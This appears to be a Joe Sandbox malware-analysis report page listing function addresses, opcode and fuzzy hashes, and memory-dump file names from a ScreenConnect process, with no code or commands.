API String ID:
Opcode ID: 169f177e9115182363e4f33cb37e65744df6d7fe5c9915bae43555ccd8e0dbdc
Instruction ID: 318368c89985af8ff27d53e634110121c1feef6953e2fef13ba7aceda3e7e369
Opcode Fuzzy Hash: 169f177e9115182363e4f33cb37e65744df6d7fe5c9915bae43555ccd8e0dbdc
Instruction Fuzzy Hash: 19112B21B19E4D0FF768A7BD18AE67866C1DBAD251B15017BF01CC33F2EC18A8814344

Function 00007FFD9B89AFF0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1d751121154953b1512b183e5c5ad9743715483c2ef5fab1bc26febcc56f30c
Instruction ID: 931b48da2222c6eabb62bca72287a3f6da7cf00c383c676c3c85b27cf686c98d
Opcode Fuzzy Hash: b1d751121154953b1512b183e5c5ad9743715483c2ef5fab1bc26febcc56f30c
Instruction Fuzzy Hash: 0F01D222B1ED4E0BDBE8A66C78615A4B3D2EBDD360B1543B7E01CC3299ED14DD828381

Function 00007FFD9BBA6F00 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa323b01fb1b3ea4ee5f93479ea6158aae814e399fcda88f1a48bd4a2ad0b31
Instruction ID: 7d8d5a00d0dbb0abd358cfdc927874fab4ea44ca3189c0bd087b52d66882a7a9
Opcode Fuzzy Hash: daa323b01fb1b3ea4ee5f93479ea6158aae814e399fcda88f1a48bd4a2ad0b31
Instruction Fuzzy Hash: 02118631B189084FE7D8EA28D4A8B7577D1FF98345B1405BED84DC72F5DE26A944C740

Function 00007FFD9B8ABA98 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e697d3ad341468168c01fb70936f6cf00d8e5578f59b8b6c6fdd3e1aefa7a7
Instruction ID: f6372bf9b21b98f5f7279ee97e38d1ccde4239978c1b33918987d99a901b8e11
Opcode Fuzzy Hash: 31e697d3ad341468168c01fb70936f6cf00d8e5578f59b8b6c6fdd3e1aefa7a7
Instruction Fuzzy Hash: 8F01A126F0AEBE8EEBA4A7A868656FD73D1EB58351F410536D01DC21D1DE242E8147C4

Function 00007FFD9BBA9900 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d265ad5da0b1bf8c22f1b0f62c1358a1429ab18585117ac96e488f530d21ad06
Instruction ID: a63ea2b391234e95cd62c710fb9ae97910d91296151a5601e0fb63c47089d199
Opcode Fuzzy Hash: d265ad5da0b1bf8c22f1b0f62c1358a1429ab18585117ac96e488f530d21ad06
Instruction Fuzzy Hash: 4B019262A1F7D81FD756877808381657FE0EF8B204B1A05EFE0D9C72E3C55949058312

Function 00007FFD9B8A007C Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e37b3f6b14d7e6470e8df978fde18285b89ffec9c4d7d33e97a15aa3461258
Instruction ID: 09f679850cb7c4d5ed7d9e89c5a308623b8c71398b0e95b87c8fcf5881d61b34
Opcode Fuzzy Hash: c3e37b3f6b14d7e6470e8df978fde18285b89ffec9c4d7d33e97a15aa3461258
Instruction Fuzzy Hash: 2811E830B2891D8FDF98EB6CD464EB9B3E1FF98301B51007AD41ED32A5DE25A8008B40

Function 00007FFD9BBA3E09 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14bc189fa94ad3741743c3c6d50594ddf2c3480e26249678a0496c51aa3ac96b
Instruction ID: 481543b63492ab9a520c34cb0f3bda7d6883e0e0f193420d7463c9cbd9f740b8
Opcode Fuzzy Hash: 14bc189fa94ad3741743c3c6d50594ddf2c3480e26249678a0496c51aa3ac96b
Instruction Fuzzy Hash: 7711E525F0E74B0BFBB9536884B03B56AE1EF45244F4A80BAC449C61E6DD2C9D818351

Function 00007FFD9B8A10E2 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee05416f1add6bfac52a170f775765cf6e65da06dc56f1763b54c295038c8d71
Instruction ID: 2c8a58a7bd20a58b12b6410325bfe858bdab53318a6302af9dae7256230edd20
Opcode Fuzzy Hash: ee05416f1add6bfac52a170f775765cf6e65da06dc56f1763b54c295038c8d71
Instruction Fuzzy Hash: AC01F911B1EACE0FDB99A77C68215647BD1EF9A610B0942F7D00CC71D7E918D9468361

Function 00007FFD9B89F26A Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a408a4b32006badda5c9820ae55f597c10b3394b7dcee7bed246951797a2a9a8
Instruction ID: b332708ee05dd2bb471cb334dacc1438c908a4c17480728d2d0f85d771eae56d
Opcode Fuzzy Hash: a408a4b32006badda5c9820ae55f597c10b3394b7dcee7bed246951797a2a9a8
Instruction Fuzzy Hash: DA01286172ED4E0BDF8CEB6C54905B5B7D1EFA832575043B6D41CC32AAEC24ED428341

Function 00007FFD9B89AF2D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f859b1a9669afd1436fec320e8342f7b3a81242391b70e6c334ade65eb1b105
Instruction ID: da3fc7f47bc5a00df27bc76864811adf73bfea92d7865da74021cdbf4b19737d
Opcode Fuzzy Hash: 4f859b1a9669afd1436fec320e8342f7b3a81242391b70e6c334ade65eb1b105
Instruction Fuzzy Hash: 9E112930A0EA995FD75AF728A4B56B47F90EF06218B0900FBD0ADCB0F7DD192909C755

Function 00007FFD9B89AAC0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d32ce1e2aa0ce2d8fc36c949c8ad24ebf1c2cf25ec645d6590f90221cf50a638
Instruction ID: 806eac0f626283a0730a7b6891ef21af9d38616b8ceb6b96b334885e79373cae
Opcode Fuzzy Hash: d32ce1e2aa0ce2d8fc36c949c8ad24ebf1c2cf25ec645d6590f90221cf50a638
Instruction Fuzzy Hash: 7A011B30A1494E8FDBA8FF68D8256A9B6E1FF18300F4104BAE41DD32D5DE3569408780

Function 00007FFD9BBACCE7 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 324f6a9a0e6564d21861080c82b0ad08513982bd0bf0ac3a80f9ec1dbf87d684
Instruction ID: afa335830f7cd14b1238639b0d4b7a0c02fdb7e10a699f55e595a85304d1a2b8
Opcode Fuzzy Hash: 324f6a9a0e6564d21861080c82b0ad08513982bd0bf0ac3a80f9ec1dbf87d684
Instruction Fuzzy Hash: F901A130A0EB0A8BD36DEB68E461579B3D1FF85308F51087DE05D822E6CE3AE542C705

Function 00007FFD9B899150 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597ada1b4d90bb3a7715dd4203195a60399431146c4c80b24e7611df31fa4f1c
Instruction ID: 2a606e56ad475791e5be583e300c66fd7af6a20c93bc32b4e2c962704280e62d
Opcode Fuzzy Hash: 597ada1b4d90bb3a7715dd4203195a60399431146c4c80b24e7611df31fa4f1c
Instruction Fuzzy Hash: 5201F921B29D4E0FEF8CE76C54989B6A7D1FBAC26471046F6D41DC32EAED24D8438380

Function 00007FFD9B89B940 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deed5b99c63c4b8f2513a52099a27231ace9b73b127175424351041cc6942ca8
Instruction ID: 3e1e27beb945f7951b087010f9859ec467e3831ea994c1f982e7115c07695a90
Opcode Fuzzy Hash: deed5b99c63c4b8f2513a52099a27231ace9b73b127175424351041cc6942ca8
Instruction Fuzzy Hash: B8F0F921B28D4D0B9F8CEB6C54959BA73C1EBA836472042B7E41CC32EAEC24D9428341

Function 00007FFD9B896205 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af881c565f039cabe7da3b79d94368a50eaf75c1e0a4d8ef61ddd63bf394f1b3
Instruction ID: 07d846c79df02d44847db8608c8aa733f2143928ad9b54297fea21d44831b419
Opcode Fuzzy Hash: af881c565f039cabe7da3b79d94368a50eaf75c1e0a4d8ef61ddd63bf394f1b3
Instruction Fuzzy Hash: A3F07D11B1EE8A0BD79CD7685861AE4B7D0EFA8350F4602BBD049C21D6DD2C68424341

Function 00007FFD9B89A587 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcc8bec26f8a39b21e55cea47eedfecd603df1acc4e4154fde4014892beadf72
Instruction ID: d28e77b5de43e314e265fbdb3c0e5334f58a35c3c6c577906b8239627c91abe3
Opcode Fuzzy Hash: bcc8bec26f8a39b21e55cea47eedfecd603df1acc4e4154fde4014892beadf72
Instruction Fuzzy Hash: 74015A35718E4E8FDF98EF6C88A066537E2FF6930471501A8D41EC7296EA31EC42CB40

Function 00007FFD9B89B5A9 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6ba9f39a31666f9c1e684a70a8f38d445671d3bcd50436346abc9e56334dd0
Instruction ID: 5a3422d22576d41b9c206cff316836319666aeed8ea8c33187af1acfda0c3735
Opcode Fuzzy Hash: 7c6ba9f39a31666f9c1e684a70a8f38d445671d3bcd50436346abc9e56334dd0
Instruction Fuzzy Hash: D901A221B1590D4FE6A8E75C8479BB437C2FF9C780F450279D45EC72E2DD166C018300

Function 00007FFD9B8A0463 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e692fb93d36810e3e1d176ec2fd802018ec8c340d24e978368277839624c0bdd
Instruction ID: 00a626f03fa37b835629bf95b705f08b9e5cbee9b475a4ae1007b07fd4e1ece4
Opcode Fuzzy Hash: e692fb93d36810e3e1d176ec2fd802018ec8c340d24e978368277839624c0bdd
Instruction Fuzzy Hash: 66F0AF63B2EC1E0BE7B8969CA46467493C1EBE86A174583B6D01DC72A5EE19AC4203C0

Function 00007FFD9BBAC08E Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8eb28159e94691c6331323799b1b6736af787efe5053339a9eeea377b3b1f69
Instruction ID: 22262d5264f8b00eeaad6332baa86b5c3f552ec1860b0896a7a337522c9644d3
Opcode Fuzzy Hash: f8eb28159e94691c6331323799b1b6736af787efe5053339a9eeea377b3b1f69
Instruction Fuzzy Hash: 8B014531A0DA4C8FDB64EF64DC509657BD0FF5831871545BAC40DC72A2DD25EA868381

Function 00007FFD9B8ABAD0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8d7d8e42fa4233ae62642749a14f2fd8457b7a6e30c7ef79360e8bf62f90dd
Instruction ID: f3404f3f76be91859bbdf210d9383a605d5de5f7e46cb0edb25d51fed80ffbb0
Opcode Fuzzy Hash: 7c8d7d8e42fa4233ae62642749a14f2fd8457b7a6e30c7ef79360e8bf62f90dd
Instruction Fuzzy Hash: B4F06D21719D0D1FD7A8FB6DD899A7472D5EB9C211301017AA41DC32AADD24EC918791

Function 00007FFD9BBA7F7A Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f9248c7a835dd2776171ab4a9b79e6e3f72a0c62e4747c23c1f7ab123cda459
Instruction ID: 63612edb38f23d2fc642f660e5db3f850d561dceca8c8a5787faedd7efc12859
Opcode Fuzzy Hash: 5f9248c7a835dd2776171ab4a9b79e6e3f72a0c62e4747c23c1f7ab123cda459
Instruction Fuzzy Hash: 2F01D63294F7C84FE76256A15C645953FF4EF87214F0A00EBE488CB0A3D2194916C322

Function 00007FFD9BBAE7F1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0314540bad38a87a04ac46afc75a51be770a9970b246ba3057256e5ce0b031ab
Instruction ID: c5d52092378edfe0b3800e164fc3e8219a1739b4e58e6607029c048971442471
Opcode Fuzzy Hash: 0314540bad38a87a04ac46afc75a51be770a9970b246ba3057256e5ce0b031ab
Instruction Fuzzy Hash: 3A014F72E15D1D8EDFB4DA5888A96ECB3E1FF94344F5102B6D01CD31A1EE346A828B80

Function 00007FFD9B89CE50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fac8a6e72375203270086d19c3f0ef917fa2b039da57292eaa4621461c983b8
Instruction ID: c2cbb8820fe5012a571525bbc0efcb9c363d4f8d6492b2e84ba679a427e89fcf
Opcode Fuzzy Hash: 4fac8a6e72375203270086d19c3f0ef917fa2b039da57292eaa4621461c983b8
Instruction Fuzzy Hash: B7F0C8A2B1AE4A0BEFF8DB6C946852427C1EFAC7D03054075E01EC72A5FC15FC024640

Function 00007FFD9BBAE717 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a45524507fecc448e26ff4d02d28c8ed10e5c61c1e4521204f8cd9e35706270
Instruction ID: dc37892539c8cd5437bf964cb03165c32df9ce7c4112f904b980e69f850f5107
Opcode Fuzzy Hash: 2a45524507fecc448e26ff4d02d28c8ed10e5c61c1e4521204f8cd9e35706270
Instruction Fuzzy Hash: 03019774A0A95D9FDBE4EB68C898E94B7F1FF28701F4541D5A44DD7162DE34AD80CB00

Function 00007FFD9B89D762 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846a6a51f198fc61a557b6711a26677d8740c4b227b39438b73af0bde7709e5b
Instruction ID: 7c35dab105da564fb45573072682b685b427bd6a2359a09805396f3af0d1aa29
Opcode Fuzzy Hash: 846a6a51f198fc61a557b6711a26677d8740c4b227b39438b73af0bde7709e5b
Instruction Fuzzy Hash: 3501A22060EA894FE796DB288474621BFE1EF46200B0904EEC09CCB1E3D9196845C702

Function 00007FFD9BBA6EEE Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95ec927c42f2ad1a4c2473abb2e8ec7fc253b1b0b7b734de6713f4670270ed2
Instruction ID: d2489d024d8faebac8194387e57b0cd82009ac1288facaf8818a01f83ab6c23f
Opcode Fuzzy Hash: a95ec927c42f2ad1a4c2473abb2e8ec7fc253b1b0b7b734de6713f4670270ed2
Instruction Fuzzy Hash: A301F431B0D9484FEBD4DB68D4B46A473E2FF95344B0901F9D48ECB1F2DA2AA905C740

Function 00007FFD9BBA59CC Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32959c49c66ba65550e5dd01fa36693c16bb741c270ca8e9b2c1442d9cdb04cf
Instruction ID: 516379e1f08cb457f40a333242da9df4a2733550ca1dd687c88d38010087bbff
Opcode Fuzzy Hash: 32959c49c66ba65550e5dd01fa36693c16bb741c270ca8e9b2c1442d9cdb04cf
Instruction Fuzzy Hash: EE01E130F1B60F19FEBD9A9590F16B522C1BF55309F85007DD84E8A1E7CD29AB49C611

Function 00007FFD9B898852 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274ac94539691b1bac00dd15ee68ee45234b8965f4cf915202098c4e348c2fb8
Instruction ID: ad5b1de4099b8bc2452546abd30b2fb63e3b80547759369ad9857833d5a6d123
Opcode Fuzzy Hash: 274ac94539691b1bac00dd15ee68ee45234b8965f4cf915202098c4e348c2fb8
Instruction Fuzzy Hash: 4A014871E1594F5FEF88EB6884659AD7BE2EF58340F440565E029D72E6DE24A8028740

Function 00007FFD9B89CEE7 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728b00734973e070c5d79e4ac7d77b4fca43da68454a1acebdb04de65424e236
Instruction ID: 31a0b1bedc2e6437ce26aa7403f19ef33ca6b9ec47000664e645d4ae7dcab544
Opcode Fuzzy Hash: 728b00734973e070c5d79e4ac7d77b4fca43da68454a1acebdb04de65424e236
Instruction Fuzzy Hash: 32F05952B2FE8E0BEBA8D67C589D5616BC2DF6C29030402B9D089C71AAFD55ED068380

Function 00007FFD9BBA2367 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7fda33ea84aedd3e1ec199c4005c427ed727867e358d7f916db71fad4011e61
Instruction ID: 42930f2759dbaf89915ef8f54819fe998e7cacb1c2e91fd015d474fb527e3053
Opcode Fuzzy Hash: f7fda33ea84aedd3e1ec199c4005c427ed727867e358d7f916db71fad4011e61
Instruction Fuzzy Hash: 7D014C71B0990A8FDB98DF48C0A0B6577D1FF59304F0680A8C44DCB2D6DE25E942C741

Function 00007FFD9BBA23D0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1b0bc9876283513d25b93659cf56bcbccf4c9482671041b12090ba6d222fa3
Instruction ID: ad1d1db55568dd18467fd0aa5b279342a6dd91a39f3b90c2db81f755b0dcf077
Opcode Fuzzy Hash: ac1b0bc9876283513d25b93659cf56bcbccf4c9482671041b12090ba6d222fa3
Instruction Fuzzy Hash: 56014871B0990A8FDB98DF48C0A0B6577E2FF58304F0680A8C44DCB2D6DA25E942C740

Function 00007FFD9BBAE9C0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ae133420497a1460acd9eb71df1bed213e09c0bedd4b65ab1daabf825d0ca0
Instruction ID: a531bd39e139a904fd8031034c537a5895b5488f45f87f6ba75e4661297583da
Opcode Fuzzy Hash: e8ae133420497a1460acd9eb71df1bed213e09c0bedd4b65ab1daabf825d0ca0
Instruction Fuzzy Hash: 50E09BB114E50C6EA61CAA55AC079F7379CE74B134F00111FE18EC5012F152B5238295

Function 00007FFD9BBAE827 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a3db92b00c82810b48973abb02bce15b4364e8caa83ab3d700f0c8bd760dc5
Instruction ID: 52578b6540dd48d2efe5f05a7f544c5ec63c835617fe04a496d331eb2a41f48d
Opcode Fuzzy Hash: 02a3db92b00c82810b48973abb02bce15b4364e8caa83ab3d700f0c8bd760dc5
Instruction Fuzzy Hash: 2801F631E1492E8EDBA4EB5888A87ECB3A1FF58305F5101FAC01DE31A0DE346AC18B40

Function 00007FFD9BBACDF8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47a32cf78fd10f64098a06b01692b515ec2636f112d7584c0bfe902779eafd38
Instruction ID: f23087b89230dbb89ec84d66b33915091cd0ec7dbf9b5e195f522dbbc9c9ed3c
Opcode Fuzzy Hash: 47a32cf78fd10f64098a06b01692b515ec2636f112d7584c0bfe902779eafd38
Instruction Fuzzy Hash: EEF0E232E496498FD3087B7498650A9BBE1FB44101B9400BAE45CC32D7DD389E028782

Function 00007FFD9BBADB2D Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aa225800f308bda5e4a3f25c91ed239fdde9a2f960ab5fe3e22e58e4282e66f
Instruction ID: c7eb3cf443b5af40897c277459013d2fc25fffbc0e4b7c067730ff81e2fc6fca
Opcode Fuzzy Hash: 2aa225800f308bda5e4a3f25c91ed239fdde9a2f960ab5fe3e22e58e4282e66f
Instruction Fuzzy Hash: 88F03C34A08E5D8FDB58DB04C8A87A9B3F0FB54301F4006AEC01AE3391DF705A84CB45

Function 00007FFD9B8961C1 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2211fc8701b5304b751a0bf712cd75e00947e00fe35c2db51e93a2ff22801325
Instruction ID: da75eb2c1badef0391742846ccb6fc70935ff96cef4254e2f7669951ecfaf07e
